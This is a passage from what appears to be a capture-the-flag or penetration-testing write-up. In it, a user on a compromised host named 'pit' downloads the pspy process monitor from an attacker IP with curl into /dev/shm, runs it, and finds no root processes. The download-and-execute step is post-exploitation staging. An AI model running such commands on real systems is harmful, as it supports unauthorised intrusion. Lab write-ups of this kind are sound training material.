PSPY


As I was unable to properly enumerate the processes due to the security policies set by SELinux, I am hoping to capture some by running PSPY

[michelle@pit shm]$ curl -s http://10.10.14.5/pspy64 -O /dev/shm/pspy64 ; chmod 755 /dev/shm/pspy64

Delivery complete

[michelle@pit shm]$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
 
 
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config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing PSPY

PSPY found nothing that executes with UID=0